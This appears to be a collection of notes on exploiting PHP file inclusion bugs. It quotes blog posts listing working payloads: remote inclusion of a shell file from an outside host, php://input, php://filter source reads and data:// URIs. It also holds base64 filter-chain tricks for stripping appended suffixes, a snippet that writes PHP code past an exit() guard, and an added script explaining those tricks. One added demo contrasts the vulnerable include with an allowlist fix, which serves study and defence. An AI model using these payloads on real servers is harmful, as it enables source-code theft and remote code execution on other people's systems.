Exploiting PHP File inclusion Vulnerabilities

http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ VERY VERY USEFUL!

"
  • Including Remote Code:
    ?file=[http|https|ftp]://websec.wordpress.com/shell.txt

    (requires allow_url_fopen=On and allow_url_include=On)

  • Using PHP stream php://input:
    ?file=php://input

    (specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)

  • Using PHP stream php://filter:
    ?file=php://filter/convert.base64-encode/resource=index.php

    (lets you read PHP source because it won't get evaluated in base64. More details here and here)

  • Using data URIs:
    ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=

    (requires allow_url_include=On)

  • Using XSS:
    ?file=http://127.0.0.1/path/xss.php?xss=phpcode

    (makes sense if firewalled or only whitelisted domains allowed)

"




http://diablohorn.wordpress.com/2010/01/16/interesting-local-file-inclusion-method/

"
So I could have stopped and given up…then again that would mean ignoring the reminder I just got about thinking outside the box. I decided to go ahead and see if I could maybe abuse any of the PHP features to at least view some source code of local PHP files. So I started to play around with the PHP filter wrapper, since according to the documentation the other ones like memory/temp/input were protected by allow_url_include. An excerpt from the documentation:
php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior to the contents being read.
So if I understand this correctly it means that I can alter the stream content BEFORE the calling function gets to work with it. Now that’s fun, so after some toying around with it and figuring out stuff (which filters it supports and such), the following command can be used to get the source of the PHP files on the server.
http://www.somesite.com/?page=php://filter/convert.base64-encode/resource=in.php
The output from the above URL is the base64 encoded content of the in.php file. YEAH BABY! Now I can go hunt for bugs in other PHP files available on the server.
Here are the references I used while researching this:
I would say this is a nice example of how to abuse intended features for your own fun and profit.
P.S. Don’t forget this is also a very nice way to download binary files, since they first get base64 encoded."
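The vulnerable include pattern that every payload in the websec list above targets, and that diablohorn's php://filter trick reads source through, shown beside a hardened version. This is an added example, not code from the page or from either quoted post; the function names, the throwaway "config.php" and its secret, and the "page" parameter are assumptions made up for the demo.

```php
<?php
// Added example (not code from the page or from the quoted posts): the vulnerable
// include pattern the payloads above target, beside a hardened version, run against
// a throwaway directory. The function names, "config.php" and its secret, and the
// "page" request parameter are assumptions made up for this demo.

$root = sys_get_temp_dir() . '/inc-demo-' . getmypid();
mkdir("$root/pages", 0700, true);
file_put_contents("$root/pages/home.php", "<?php echo 'home page'; ?>");
// constructed sample secret, the kind of thing a php://filter read leaks
file_put_contents("$root/config.php", "<?php \$db_password = 'constructed-secret'; ?>");

// Vulnerable: the request value is the whole include target, so php://filter,
// php://input, data:// and ../ traversal all reach include() unchanged.
function render_vulnerable(string $page): string
{
    ob_start();
    include $page;
    return (string) ob_get_clean();
}

// Hardened: the request value is only a key into a fixed allowlist; user input never
// becomes part of the path, so no wrapper or traversal string can be smuggled in.
function render_hardened(string $page, string $root): string
{
    $allowed = ['home' => 'home.php'];
    if (!isset($allowed[$page])) {
        return "404 unknown page\n";
    }
    ob_start();
    include "$root/pages/" . $allowed[$page];
    return (string) ob_get_clean();
}

// 1. php://filter against the vulnerable handler: config.php comes back base64-encoded,
//    so its <?php tags are never executed and the source can be decoded offline.
$payload = 'php://filter/convert.base64-encode/resource=' . $root . '/config.php';
$leaked  = base64_decode(render_vulnerable($payload), true);
printf("leaked via php://filter:\n%s\n\n", $leaked);

// 2. The same payload never reaches include() in the hardened handler.
printf("hardened handler, payload: %s", render_hardened($payload, $root));
printf("hardened handler, 'home':  %s\n\n", render_hardened('home', $root));

// 3. data:// (like php://input and http://) also needs allow_url_include=On, which is
//    Off by default, so only try it when this interpreter allows it.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    $code = base64_encode("<?php echo 'code ran from a data:// URI'; ?>");
    printf("data:// result: %s\n", render_vulnerable("data://text/plain;base64,$code"));
} else {
    echo "allow_url_include is Off: data://, php://input and remote includes fail here\n";
}

// clean up the throwaway directory
unlink("$root/pages/home.php");
unlink("$root/config.php");
rmdir("$root/pages");
rmdir($root);
```

Run it with `php` from the command line. Note that php://filter needs no allow_url_include at all, which is why it is the one wrapper that keeps working after PHP 5.2 turned remote includes off; the allowlist version closes it anyway because the request value never reaches the path.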


Good links found during the studies:
http://blog.php-security.org/archives/45-PHP-5.2.0-and-allow_url_include.html
http://gynvael.coldwind.pl/?id=376


Other links I read
http://blog.nearlyfreespeech.net/2009/11/05/a-php-include-exploit-explained/
http://seclists.org/fulldisclosure/2009/Dec/204
http://www.suspekt.org/page/2/
http://upshell.wordpress.com/category/skill/
http://www.xoops.org/modules/newbb/viewtopic.php?topic_id=66247
http://php.net/manual/en/wrappers.data.php
http://www.php.net/manual/en/wrappers.php.php

//This can be useful source: http://sla.ckers.org/forum/read.php?16,33245,33449

OK, php://input won't work either because of the appended .htm and the fact that you can't use null bytes (probably magic_quotes_gpc=on). Besides null bytes you could also try techniques described here:
http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
but they likely fail.

Another cool trick is to encode your payload 3 times and then decode it 3 times using php://filter. Any non-ASCII chars (and if you decode .htm it will end in those) will be stripped by decoding 3 times due to the character set of base64:

php://filter/write=convert.base64-decode/resource=php://filter/write=convert.base64-decode/resource=php://filter/write=convert.base64-decode/resource=YOUR_PAYLOAD_BASE64_ENCODED_3TIMES

The appended .htm will then get removed automatically by decoding 3 times. Your payload will survive because you have encoded it 3 times.




// For the below one I didn't find any implementation
<?php
$shellcode = 'PD9waHBpbmZvKCk7Pz4';   // base64 of "<?phpinfo();?>" with the trailing '=' removed
$endstr    = 's';                      // one filler char: the prefix leaves 19 base64 chars, 's' makes it 20

$timestamp = $endstr . $shellcode;
file_put_contents("php://filter/write=convert.base64-decode/resource=ryat.php", "<?php exit('Access Denied'); ?>\t$timestamp");

?>
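Why both base64 tricks above (the triple-decode of the sla.ckers note and the exit()-prefix bypass in the snippet just above) work, as an added example that is not from the page, the forum post or ryat's snippet: PHP's base64 decoder silently drops bytes outside the base64 alphabet. The helper `base64_alignment_filler` is my own name, the files are throwaway temp files, and the three stacked convert.base64-decode filters are emulated with three base64_decode() calls, which skip invalid bytes the same way.

```php
<?php
// Added example, not from the page, the sla.ckers post or ryat's snippet: why both base64
// tricks above work. PHP's base64 decoding (base64_decode() without strict mode, and the
// convert.base64-decode stream filter used by the snippet above) silently drops bytes that
// are not in the base64 alphabet. Text wrapped around a payload therefore mostly vanishes;
// only its alphabet characters survive, and one filler character can push the real payload
// back onto a 4-character group boundary. The file names are throwaway temp files.

// How many alphabet characters does a wrapper contribute, and how many filler characters
// are needed so the payload that follows starts on a 4-character group boundary?
function base64_alignment_filler(string $wrapper): string
{
    $kept = preg_replace('~[^A-Za-z0-9+/]~', '', $wrapper);
    $missing = (4 - strlen($kept) % 4) % 4;
    return str_repeat('a', $missing);   // any alphabet char will do; the snippet above uses 's'
}

// --- Trick 1: a forced "<?php exit(...); ?>" prefix, as in the snippet above ---
$prefix    = "<?php exit('Access Denied'); ?>\t";          // what the app prepends to its file
$shellcode = rtrim(base64_encode('<?phpinfo();?>'), '=');  // PD9waHBpbmZvKCk7Pz4, a '=' would end the stream
$filler    = base64_alignment_filler($prefix);            // "phpexitAccessDenied" is 19 chars -> 1 filler

$target = tempnam(sys_get_temp_dir(), 'ryat');
file_put_contents('php://filter/write=convert.base64-decode/resource=' . $target,
                  $prefix . $filler . $shellcode);
$written = file_get_contents($target);
unlink($target);

// The 20 surviving prefix characters decode to 15 bytes of junk; the PHP tag starts right after.
printf("prefix residue : %s\n", bin2hex(substr($written, 0, 15)));
printf("payload on disk: %s\n", substr($written, 15));    // <?phpinfo();?>

// --- Trick 2: an appended ".htm" removed by decoding three times ---
// A payload whose length is a multiple of 27 bytes encodes three times without any '='
// padding (27 -> 36 -> 48 -> 64 chars), so the suffix lands cleanly after a full group.
$payload = "<?php echo 'hello LFI!'; ?>";                  // 27 bytes
$triple  = base64_encode(base64_encode(base64_encode($payload)));
$served  = $triple . '.htm';                               // what the include() sees

// Three stacked convert.base64-decode filters are emulated with three base64_decode() calls.
// Round 1 drops '.', and "htm" becomes two junk bytes (0x86 0xd9); round 2 drops those.
$stage = $served;
for ($round = 1; $round <= 3; $round++) {
    $stage = base64_decode($stage);
}
printf("after 3 decodes: %s\n", $stage);                   // <?php echo 'hello LFI!'; ?>
```

The filler calculation is the general form of the hard-coded `'s'` in the snippet: count the alphabet characters the forced prefix leaves behind and top them up to a multiple of four, otherwise the decoder consumes the first characters of your payload to complete the prefix's last group. The junk that the prefix decodes to is emitted as raw bytes before your code when the file is later included, which is harmless for a web shell but worth knowing when you look at the resulting file.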